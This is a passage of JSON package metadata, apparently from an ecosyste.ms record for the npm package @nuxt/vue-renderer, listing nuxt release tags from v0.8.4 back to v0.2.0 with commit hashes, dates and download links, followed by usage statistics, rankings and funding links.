tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-09-08T14:59:12.210Z","dependent_packages_count":8,"downloads":583152,"downloads_period":"last-month","dependent_repos_count":56773,"rankings":{"downloads":0.24508451494413336,"dependent_repos_count":0.12629555175806825,"dependent_packages_count":2.4792591758145988,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.4437801426250028,"average":0.6614955972504738},"purl":"pkg:npm/%40nuxt/vue-renderer","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/vue-renderer","docker_dependents_count":259,"docker_downloads_count":1376808,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vue-renderer","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vue-renderer/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":n